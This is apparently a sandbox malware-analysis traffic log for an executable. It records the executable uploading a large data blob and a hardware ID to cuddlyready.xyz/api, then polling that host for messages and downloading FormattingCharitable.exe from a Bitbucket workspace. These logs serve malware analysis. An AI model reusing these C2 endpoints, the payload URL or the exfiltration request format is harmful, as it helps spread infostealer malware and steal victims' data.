                                                                                                                                                          2024-12-23 08:16:54 UTC1227OUTData Raw: 2d 2d 4f 53 47 30 4f 56 50 54 56 55 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 37 39 42 45 34 33 44 38 35 34 30 43 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4f 53 47 30 4f 56 50 54 56 55 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 53 47 30 4f 56 50 54 56 55 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4f 53 47 30 4f 56 50 54
                                                                                                                                                          Data Ascii: --OSG0OVPTVU5QContent-Disposition: form-data; name="hwid"A179BE43D8540CACAC8923850305D13E--OSG0OVPTVU5QContent-Disposition: form-data; name="pid"1--OSG0OVPTVU5QContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--OSG0OVPT
                                                                                                                                                          2024-12-23 08:16:55 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:16:55 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=f44h3n5aec2p6bl4a390og0d84; expires=Fri, 18 Apr 2025 02:03:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGkJr6re3mx7Mg%2FDgCEWXsrcgwcALSRUZt3Si6VU9k9XmJNgBzte6rJUPFXhbGXrBOYPMnhl6BjSlIjdE3t3moXPq2GrE62pFu7IJTaudD%2BJPQsCGLow13tga%2FkR07sX3qs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9868a804349-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1709&rtt_var=643&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2137&delivery_rate=1697674&cwnd=227&unsent_bytes=0&cid=c75c7885fe032ac5&ts=787&x=0"
                                                                                                                                                          2024-12-23 08:16:55 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                          2024-12-23 08:16:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          6192.168.2.649752172.67.150.1734434140C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-23 08:16:57 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=BEW3OHZ1B
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 552416
                                                                                                                                                          Host: cuddlyready.xyz
                                                                                                                                                          2024-12-23 08:16:57 UTC15331OUTData Raw: 2d 2d 42 45 57 33 4f 48 5a 31 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 37 39 42 45 34 33 44 38 35 34 30 43 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 45 57 33 4f 48 5a 31 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 45 57 33 4f 48 5a 31 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 42 45 57 33 4f 48 5a 31 42 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                          Data Ascii: --BEW3OHZ1BContent-Disposition: form-data; name="hwid"A179BE43D8540CACAC8923850305D13E--BEW3OHZ1BContent-Disposition: form-data; name="pid"1--BEW3OHZ1BContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--BEW3OHZ1BConten
                                                                                                                                                          2024-12-23 08:16:57 UTC15331OUTData Raw: 67 b9 86 8d 91 8f db 07 24 d3 7e 55 ba 0d 57 0a 7e 7a 8b 8c 70 d9 10 31 81 fb 69 76 2e c7 33 ea 4f 56 ac f9 fe d8 54 e9 06 cb 39 9d 66 8a 5f 52 d8 a5 5f bc 4d aa ad 12 da 0b e0 c6 44 6f c2 94 81 94 e0 d5 a8 e6 6a 4d c4 4c 61 23 b4 79 09 cc 22 b7 46 a3 88 9d ad 0d c2 ea 27 5d 92 32 8b a6 fd b2 46 7d 29 75 0f 57 4e 7e 3e 01 92 d3 c3 b8 d4 e7 a0 ef 59 91 6e 83 8c 7b 60 81 ab 3e 56 8d 3e 2b 09 be b3 4b 39 ff ce b1 d6 ad f4 c0 2b de 25 bd 32 f0 9a 7f 53 b1 11 96 3f cd b7 a9 29 8f ee d2 82 6b 03 f6 45 43 0c 34 6b 26 a9 56 67 84 90 6f 07 36 7f a3 4c 49 e0 d9 fc 85 0b ec e7 63 9d 13 06 9a df 94 eb d9 a8 c6 ed 88 f9 9f 65 53 5e 2a 29 a5 b4 ca cf 96 ed 60 29 b4 bb ff dd 71 46 12 fa ca 7d 8e b3 de db a1 d7 52 0b 83 05 c5 ff 77 fb e4 c2 15 e6 c4 61 65 29 13 90 9c b2
                                                                                                                                                          Data Ascii: g$~UW~zp1iv.3OVT9f_R_MDojMLa#y"F']2F})uWN~>Yn{`>V>+K9+%2S?)kEC4k&Vgo6LIceS^*)`)qF}Rwae)
                                                                                                                                                          2024-12-23 08:16:57 UTC15331OUTData Raw: 50 d7 c7 aa 8e d0 8a 0d 67 4b 86 06 b5 be f0 3c a9 40 1c 08 89 99 fe fe 35 cb 03 38 14 d8 47 44 f4 11 cf 1a 4b 78 08 34 a5 50 31 0f b7 83 83 04 17 c6 98 1f e7 c2 3e c9 f1 6c bb e5 7e b3 d3 86 46 c4 5e 39 10 0a b1 92 ca 6f 2c b4 0d 19 2f 62 89 8a c1 31 1a ad 7b 64 2e 01 8b 37 3b be f3 87 a7 f5 bb 3f 18 b7 d7 6e 18 4d 17 77 db 3e b7 f5 f8 aa 31 5d cb 6a a9 7d e3 33 a4 a1 42 23 63 e1 ee 41 96 ca 34 23 af 4a bb 9a 5e 1f fd 3d 2f 68 de 79 fa a9 63 da d3 e0 11 69 f1 37 56 b6 be 56 db b5 36 5b d7 11 94 51 5a e3 27 71 c7 7d 6f 62 48 ed 71 60 66 40 31 c2 0d c3 80 b8 76 a2 54 f7 b9 3e 7b f3 b5 24 6b 15 2c e9 e2 16 86 6e a3 c1 b0 24 00 81 01 ff 02 9a e0 64 9a 86 3d 58 6a 68 51 71 d5 06 bf 2a 7f af 2f 41 e4 1e 4c 45 52 58 07 d0 c3 2d 70 15 b8 fd 8b a6 7d 13 a1 22 31
                                                                                                                                                          Data Ascii: PgK<@58GDKx4P1>l~F^9o,/b1{d.7;?nMw>1]j}3B#cA4#J^=/hyci7VV6[QZ'q}obHq`f@1vT>{$k,n$d=XjhQq*/ALERX-p}"1
                                                                                                                                                          2024-12-23 08:16:57 UTC15331OUTData Raw: e8 ef 7f eb 5e 16 e2 50 24 b2 e7 92 e2 b0 fa 37 40 d8 4b b4 c4 bc c4 12 bf 4c ca 2d 70 83 33 3f a1 25 af 5d 42 71 e5 dc d0 0e 11 d6 8f a0 36 18 e9 89 01 ca 7d 27 e6 a6 8a 2c f5 e6 92 8a 56 91 e8 1c bf fc 32 9c 64 68 b0 f0 0d ef 56 2a 40 db 87 b1 ee ff 8e 8a 71 e6 65 4e 6d 64 1e ce 7f bd de dd 0a 5c 3c df 4a 80 f0 a2 53 e1 4b ed 79 bf 32 ee dd 68 63 db 76 0a d8 f6 7b b2 65 7b 52 84 8c 93 8d a6 22 9d 0d 49 32 59 f2 45 25 80 55 16 79 d1 17 b7 69 24 b4 30 5d be a0 28 71 4a c6 c2 26 c4 93 e7 50 4e cb 04 c8 c5 e7 c7 23 f8 8d 63 49 b3 db a7 df ec e3 d4 a2 4a db 3d c1 33 da d7 c6 ec dc a0 c4 6e 1f 02 37 9e ab ca 84 2b 8d d0 cf ea 6b a2 b2 16 8b 0f d1 ca 25 58 8a 22 7b d6 1a 1e 11 2f 4c 72 df 69 4d ba 6b 10 24 df b6 d5 db b7 ad f3 b7 51 a8 fb 59 6f 8b 29 03 62 48
                                                                                                                                                          Data Ascii: ^P$7@KL-p3?%]Bq6}',V2dhV*@qeNmd\<JSKy2hcv{e{R"I2YE%Uyi$0](qJ&PN#cIJ=3n7+k%X"{/LriMk$QYo)bH
                                                                                                                                                          2024-12-23 08:16:57 UTC15331OUTData Raw: 36 2f 5d 6b 8d 27 b9 c3 06 35 99 d3 d1 8f ea 90 90 cf c3 33 37 48 a4 d6 6b f3 91 93 bd 12 5a 24 1b 12 3d 39 45 84 2d 52 7b 76 01 13 f0 da 3f 82 3a bd 67 f6 a1 96 b0 a9 c1 5a ef 4d c1 cd 9d d6 dd e3 9d ce 1d 7a 89 20 d8 2a 15 66 2b 73 1b be 21 92 4b 8e 0d 59 38 44 1c 6d 71 68 dc 0d a2 f4 a5 5a b7 76 aa cd 29 20 96 75 a1 3f b1 7f fa a5 0e f8 d1 db 10 a3 ca 79 2f a3 d4 14 9b f0 4c 75 d1 97 27 39 36 8b f6 2d 52 9f 49 6a d7 67 7f fe 53 48 cd 78 89 5a b3 7e d7 71 c3 32 a5 54 34 bd bd a1 84 77 3e 8d 3a 75 c5 2e 71 de 8f d7 90 b7 57 2a d0 3a 20 92 b2 4c 5c f5 2a d1 df 9e b8 7c 85 77 ef 6a d5 40 f0 c0 d9 19 d8 ef 4e 7f 09 c7 3c a7 6a 42 78 0a 46 94 c0 bd 49 42 1a 04 f4 bf 87 bb 9e ce 3a 23 79 d0 a4 07 ed 52 e5 53 ab 8b 30 6d ed cd 81 33 f2 8d 79 af e7 e9 8f 3a 94
                                                                                                                                                          Data Ascii: 6/]k'537HkZ$=9E-R{v?:gZMz *f+s!KY8DmqhZv) u?y/Lu'96-RIjgSHxZ~q2T4w>:u.qW*: L\*|wj@N<jBxFIB:#yRS0m3y:
                                                                                                                                                          2024-12-23 08:16:57 UTC15331OUTData Raw: 89 38 1d f7 e0 e8 8d 1b bd 08 40 ba aa 75 6f 88 72 4c 95 38 59 c2 a6 30 5b 99 e0 50 20 0b b6 0e 0c c7 40 b9 02 e0 4b 76 57 d1 6a 3a a4 ef 0c 58 e2 a4 24 34 2a 37 ad 11 c4 ca 8b 02 f9 3f 2f 71 f2 40 96 19 fb e4 67 ec 14 0e 36 6b c7 81 7c 7d 54 74 b2 95 81 43 a9 50 e0 50 44 6e 1a 5f 34 72 18 8d 99 b5 ae a1 cd 91 16 6c e1 46 1e 62 27 60 63 3b 0f 7c cc d7 a8 76 39 8b bc 20 00 ff b2 cc ad 4d ae ba c4 29 f9 88 3d 4d 17 16 bb 2c 10 f3 7d 74 e7 cc e5 67 96 f2 bd 17 a6 ec d1 b1 bc 19 4d 53 6a a6 ac 7e ba 06 e6 3f af d5 bd 37 81 8f fd 80 68 72 2b a8 9b ad 6b bc e6 32 88 77 c7 c2 1b d9 7d f7 dc 0f 8c ca c1 91 8a a4 33 00 99 e0 15 17 03 b9 dc ab 7e 63 63 1f 48 57 89 a4 13 14 8a 1c b2 0b 3b 2e 0a 62 0e ed b6 c2 93 11 8a 4a b5 d3 b0 5e 45 7d a3 d6 74 90 a2 67 ca 1b eb
                                                                                                                                                          Data Ascii: 8@uorL8Y0[P @KvWj:X$4*7?/q@g6k|}TtCPPDn_4rlFb'`c;|v9 M)=M,}tgMSj~?7hr+k2w}3~ccHW;.bJ^E}tg
                                                                                                                                                          2024-12-23 08:16:57 UTC15331OUTData Raw: 62 6c 53 d6 29 16 5e 41 4d 7f ce ac 14 e5 be 9a 4c a2 48 69 6b fc 12 d5 2e 48 e0 44 77 7d 9b 37 b6 0c b6 14 04 6b 73 35 5b 0d 5e 59 6e 69 55 26 a1 14 21 e0 24 a5 6d bb f8 01 c2 41 f4 9e ff 5b 11 1a be e3 d7 15 7e fa 50 97 ac 51 7e d5 fa 8e 63 a5 6e e7 27 04 16 b6 0a 31 21 d6 c4 cd 06 b2 2e 1e 5b 04 ef 54 9e 33 c5 45 c6 68 5e 23 12 9b 5a 19 f7 60 bf 5b 1c 68 ff df 5a 41 59 09 14 f7 7d a2 51 c0 18 ad 0a 51 03 cf d0 5d e0 84 48 2a df f6 b7 31 5a 0a 6f f2 7e 24 e5 f1 14 7e f4 35 d6 26 33 fd 29 3c 1c 02 39 f9 f8 2f 22 ac 12 c0 f8 c1 f8 36 48 0e 7c a3 c0 87 58 8b ab 9e 7a 40 f8 c1 2c 10 b3 a7 96 34 9b 5b 11 82 cf 97 45 a3 0b b9 32 17 e2 06 d4 d3 b0 0c 02 c2 ad 2b a8 cc 8b 26 e7 18 6a 80 4a 64 cc a0 8b 1f 39 cb f0 ee 1b 3c 57 98 84 42 9a ef ee 53 42 ff f6 c4 9b
                                                                                                                                                          Data Ascii: blS)^AMLHik.HDw}7ks5[^YniU&!$mA[~PQ~cn'1!.[T3Eh^#Z`[hZAY}QQ]H*1Zo~$~5&3)<9/"6H|Xz@,4[E2+&jJd9<WBSB
                                                                                                                                                          2024-12-23 08:16:57 UTC15331OUTData Raw: 51 62 93 e0 b3 6d c7 cc fc 50 7d d7 79 0a 6e a6 8a fa 47 c8 6c d7 d0 ad 17 76 85 06 ec 3c 73 6c 10 17 35 2c fa fb 75 24 b6 89 c7 61 bd 12 c2 75 f7 31 d2 c4 83 c1 0f 68 e1 d0 98 55 32 b7 61 8a 0c 17 07 63 8e 0b ef 62 b1 0c e6 73 be 79 d1 bf 07 f2 e0 d3 b9 35 9c f7 22 4b 59 f6 89 54 0d 5d a5 44 6f ba ac cd 57 03 6e 89 ef 2d 59 61 89 0a bd 8f 6d 6f 5b 2d f2 e1 74 7f 71 93 8b bc 3b 89 fb b9 e1 73 73 71 23 7a a9 4d 5e a1 ba 76 bb 68 db eb 24 f1 e3 01 75 7c 24 15 f8 47 04 ab f2 2a be 96 61 74 88 d8 d2 4c 1a a3 b4 2b 73 89 05 7c b8 fe 8b 2e 86 fe a4 9b 10 8e 2a e3 e0 9f ed ec 14 83 15 b2 35 b2 94 cc 21 6a e6 3a b5 4d bc c6 07 ed 03 44 44 a0 8b b8 7c e4 94 52 7b 2a b6 77 55 b6 3f 62 bb ec 41 c0 e2 c4 2e fa 69 24 13 c5 18 b9 a6 b1 5f 82 f8 fd b9 75 de 89 42 d5 60
                                                                                                                                                          Data Ascii: QbmP}ynGlv<sl5,u$au1hU2acbsy5"KYT]DoWn-Yamo[-tq;ssq#zM^vh$u|$G*atL+s|.*5!j:MDD|R{*wU?bA.i$_uB`
                                                                                                                                                          2024-12-23 08:16:57 UTC15331OUTData Raw: e5 b1 01 a5 b1 fe 07 27 1d 5d e0 45 67 95 c8 a9 46 8a b9 4b b1 ba 6b b4 fa 70 eb d6 0b 5e d0 b8 aa 65 ef 76 b9 c8 bd ef 89 8c 74 2b 8b 07 11 a3 55 f7 f7 47 ae e4 11 ee f4 6d ec a9 0d aa b6 d9 83 e9 57 b7 c7 93 12 d9 f8 1a 73 06 91 4b 82 c9 79 90 f8 31 65 95 92 7d 1a a9 6a 39 4d 96 62 22 22 4b bb b6 35 3a ed 50 8b d6 96 6f 5d a2 6a 35 aa 24 24 35 5b 91 6b 28 2c b2 3c 7d 54 9c 12 84 16 4a 1a f1 71 a5 72 51 91 09 dc aa ef 8e f8 83 5e a2 db 78 42 1a 93 b6 3d 87 a5 9f 76 d3 3e 51 f9 e7 5a f2 01 38 54 94 27 2b 3d a7 34 b2 e0 16 1a d1 81 86 97 ba ff 53 7a c6 60 8b 2e f3 f3 de 1b 23 ba 20 55 89 60 f4 ff 36 80 ad 5b b3 7a e5 40 fb 83 ca 13 ff 5c 52 91 dc a4 f9 c2 16 f5 4e c8 f0 fa 25 55 5d 0c b3 d8 8a ae c5 06 2c 56 d6 cd f7 d8 10 ea e0 06 01 b7 68 28 06 87 12 db
                                                                                                                                                          Data Ascii: ']EgFKkp^evt+UGmWsKy1e}j9Mb""K5:Po]j5$$5[k(,<}TJqrQ^xB=v>QZ8T'+=4Sz`.# U`6[z@\RN%U],Vh(
                                                                                                                                                          2024-12-23 08:16:57 UTC15331OUTData Raw: ae 12 b7 2a 53 7a 47 b2 d2 d1 30 2a 1c 75 2d 9a 2e cb 0d 4c 13 d6 e1 e8 6f 5f b3 bf 95 d1 03 c1 99 70 de 20 53 34 49 bf 11 7a 66 dd 32 d3 5a 8d ed 57 4f c2 53 0b 37 fd 52 d9 b7 ec 08 ac f1 5b 12 bb 54 65 29 ec d6 f7 58 36 f6 96 5a 80 0d 1c 81 8a 44 c1 ca 5f 36 e5 1c 27 5d 50 0b 73 18 f8 99 3a 9f d8 f7 3d c3 0b 1a 30 ba 61 bd 81 70 02 34 3c 84 f7 ed ba 7a 37 b7 76 3d 98 fd d7 a6 86 4f 46 fa 1a 99 69 12 b6 0d 8e a6 ec fa 6f ca 7d d5 ce 61 77 81 fd 73 5d 72 a4 65 37 22 f5 d7 3c 2c 81 e8 3c de 12 17 5a 63 99 ef e2 84 83 86 9d b1 24 37 06 1c be e7 60 e3 a2 48 47 ff d7 97 4a 29 5c 6d fc 9b 1d d4 34 a5 94 7f ad b6 0d 54 06 f2 c7 cc 33 dd c2 fb 7c 90 2d b5 65 68 6c df 3f d4 ac fd b1 3f 49 8d 21 2b e9 11 89 b4 d6 fd 61 01 3b dc 61 8a 8a cc 0b 17 7b b5 f0 c0 c9 5b
                                                                                                                                                          Data Ascii: *SzG0*u-.Lo_p S4Izf2ZWOS7R[Te)X6ZD_6']Ps:=0ap4<z7v=OFio}aws]re7"<,<Zc$7`HGJ)\m4T3|-ehl??I!+a;a{[
                                                                                                                                                          2024-12-23 08:17:00 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:17:00 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=lgliq05f2c3gutv1fj7r19cn49; expires=Fri, 18 Apr 2025 02:03:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0DEJ7IbVXIdr7DkDqFbXbbgqMg7rZYYgPtct%2FGFRqNvqc5h7HHzjhTIhVvIcB7frnxzRq75t6bJxehKhViQ6d1kt0vOqDBpPGOHCK3f0Zs6QAT7ZU8fhCHhU7lBju3hUG0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9963d2f72b7-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1892&min_rtt=1844&rtt_var=726&sent=194&recv=574&lost=0&retrans=0&sent_bytes=2837&recv_bytes=554909&delivery_rate=1583514&cwnd=192&unsent_bytes=0&cid=fa4b55007a160766&ts=3664&x=0"


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          7192.168.2.649763172.67.150.1734434140C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-23 08:17:02 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 88
                                                                                                                                                          Host: cuddlyready.xyz
                                                                                                                                                          2024-12-23 08:17:02 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 41 31 37 39 42 45 34 33 44 38 35 34 30 43 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=A179BE43D8540CACAC8923850305D13E
                                                                                                                                                          2024-12-23 08:17:02 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:17:02 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=jokmjbneasdvvmgaln77sjqjq6; expires=Fri, 18 Apr 2025 02:03:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKpUZIP4sL6%2FALd2WOVJTaJRW83vGSnH%2BXa5N9SDxhPekgljYcDhENgcLdmMVWsq%2Bh0QIeI11NHtjbhrUpCxP473%2BlhlNa9HSMgcQJrPKTnD3oOU6OLyRjX61S1HT%2BqS5yg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9b5ec7680d6-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1478&rtt_var=569&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1898569&cwnd=193&unsent_bytes=0&cid=34c99bbd3c1d7488&ts=822&x=0"
                                                                                                                                                          2024-12-23 08:17:02 UTC198INData Raw: 63 30 0d 0a 33 71 71 39 63 53 2f 53 6e 33 53 35 70 43 43 6b 73 48 45 4d 4a 59 62 33 6b 4e 54 51 37 30 44 64 37 71 6b 6d 49 68 6f 35 2b 6a 4f 46 30 5a 38 45 44 65 69 39 48 4d 33 51 55 4e 65 4b 4c 53 4e 35 71 5a 58 35 6f 4c 4b 61 49 37 61 4c 33 51 68 4e 61 46 36 6d 48 4c 50 54 30 78 52 59 70 66 41 47 30 74 64 51 78 64 4d 55 50 52 65 31 78 4b 48 6d 6a 4d 41 7a 76 6f 44 4e 65 67 31 2b 56 6f 31 64 73 73 58 63 46 56 79 4f 73 44 4c 57 31 6b 33 46 78 41 56 6c 53 2b 47 30 2b 4c 57 69 68 6a 53 38 6a 4d 56 44 44 48 39 42 6e 78 48 79 69 4e 73 46 44 65 69 76 57 4a 76 42 41 70 36 42 44 46 45 3d 0d 0a
                                                                                                                                                          Data Ascii: c03qq9cS/Sn3S5pCCksHEMJYb3kNTQ70Dd7qkmIho5+jOF0Z8EDei9HM3QUNeKLSN5qZX5oLKaI7aL3QhNaF6mHLPT0xRYpfAG0tdQxdMUPRe1xKHmjMAzvoDNeg1+Vo1dssXcFVyOsDLW1k3FxAVlS+G0+LWihjS8jMVDDH9BnxHyiNsFDeivWJvBAp6BDFE=
                                                                                                                                                          2024-12-23 08:17:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          8192.168.2.649769185.166.143.484434140C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-23 08:17:04 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Host: bitbucket.org
                                                                                                                                                          2024-12-23 08:17:05 UTC5935INHTTP/1.1 302 Found
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:17:05 GMT
                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Server: AtlassianEdge
                                                                                                                                                          Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI [TRUNCATED]
                                                                                                                                                          Expires: Mon, 23 Dec 2024 08:17:05 GMT
                                                                                                                                                          Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                          X-Used-Mesh: False
                                                                                                                                                          Vary: Accept-Language, Origin
                                                                                                                                                          Content-Language: en
                                                                                                                                                          X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                          X-Dc-Location: Micros-3
                                                                                                                                                          X-Served-By: acf7b66233a6
                                                                                                                                                          X-Version: c9b3998323c0
                                                                                                                                                          X-Static-Version: c9b3998323c0
                                                                                                                                                          X-Request-Count: 2740
